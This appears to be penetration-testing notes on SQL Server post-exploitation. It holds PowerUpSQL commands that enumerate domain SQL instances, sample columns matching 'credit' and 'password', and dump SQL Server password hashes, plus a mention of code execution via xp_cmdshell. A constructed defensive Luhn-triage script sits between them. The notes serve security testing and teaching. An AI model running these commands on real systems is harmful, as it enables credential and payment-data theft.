Post Exploitation
Indicators of sensitive information include size, the use of transparent encryption, names, etc.
For example, we can use this PowerUpSQL query to identify sensitive info based on names:
Get-SQLInstanceDomain | Get-SQLConnectionTest | Get-SQLColumnSampleDataThreaded -Verbose -Threads 10 -Keyword "credit,money,password" -SampleSize 2 -ValidateCC -NoDefaults
Or with transparent encryption:
Get-SQLInstanceDomain | Get-SQLConnectionTest | Get-SQLDatabaseThreaded -Verbose -Threads 10 -NoDefaults | Where-Object {$_.is_encrypted -eq "TRUE"} |
Get-SQLColumnSampleDataThreaded -Verbose -Threads 10 -Keyword "card, password" -SampleSize 2 -ValidateCC -NoDefaults
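The -Keyword switch matches column names and -ValidateCC checks sampled values with the Luhn formula. A data owner can run the same triage over their own column inventory to decide which columns need masking, encryption or auditing. This is an added example, not PowerUpSQL code; Test-Luhn, Find-SensitiveColumn and the sample inventory are hypothetical and constructed for illustration.

```powershell
function Test-Luhn {
    param([string]$Value)
    # Strip separators commonly found in stored card numbers.
    $digits = $Value -replace '[\s-]', ''
    if ($digits -notmatch '^\d{13,19}$') { return $false }

    $sum = 0
    $double = $false
    # Walk right to left, doubling every second digit.
    for ($i = $digits.Length - 1; $i -ge 0; $i--) {
        $d = [int]::Parse($digits.Substring($i, 1))
        if ($double) {
            $d *= 2
            if ($d -gt 9) { $d -= 9 }
        }
        $sum += $d
        $double = -not $double
    }
    return (($sum % 10) -eq 0)
}

function Find-SensitiveColumn {
    param(
        [object[]]$Column,
        [string[]]$Keyword = @('credit', 'money', 'password')
    )
    foreach ($c in $Column) {
        # Name match is case-insensitive, as -like is by default.
        $hit = @($Keyword | Where-Object { $c.Name -like "*$_*" })
        if ($hit.Count -eq 0) { continue }
        $luhn = @($c.Samples | Where-Object { Test-Luhn $_ }).Count
        $priority = if ($luhn -gt 0) { 'High' } else { 'Review' }
        [pscustomobject]@{
            Table     = $c.Table
            Column    = $c.Name
            Keyword   = ($hit -join ',')
            LuhnValid = $luhn
            Priority  = $priority
        }
    }
}

# Constructed inventory: column names with two sampled values each.
$inventory = @(
    [pscustomobject]@{ Table = 'dbo.Payments'; Name = 'CreditCardNumber'; Samples = @('4111 1111 1111 1111', '1234 5678 9012 3456') }
    [pscustomobject]@{ Table = 'dbo.Users';    Name = 'PasswordHint';     Samples = @('first pet', 'home town') }
    [pscustomobject]@{ Table = 'dbo.Orders';   Name = 'OrderTotal';       Samples = @('19.99', '5.00') }
)
Find-SensitiveColumn -Column $inventory | Format-Table -AutoSize
```

Columns flagged High hold at least one value that passes the Luhn check; Review columns matched on name only and need a manual look.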
PowerUpSQL has a very useful function called Get-SQLServerPasswordHash that automates extracting password hashes.
Get-SQLServerPasswordHash -Verbose -Instance MSSQLSERVER2016\DATABASE -Migrate
- Getting code execution via xp_cmdshell and sp_OACreate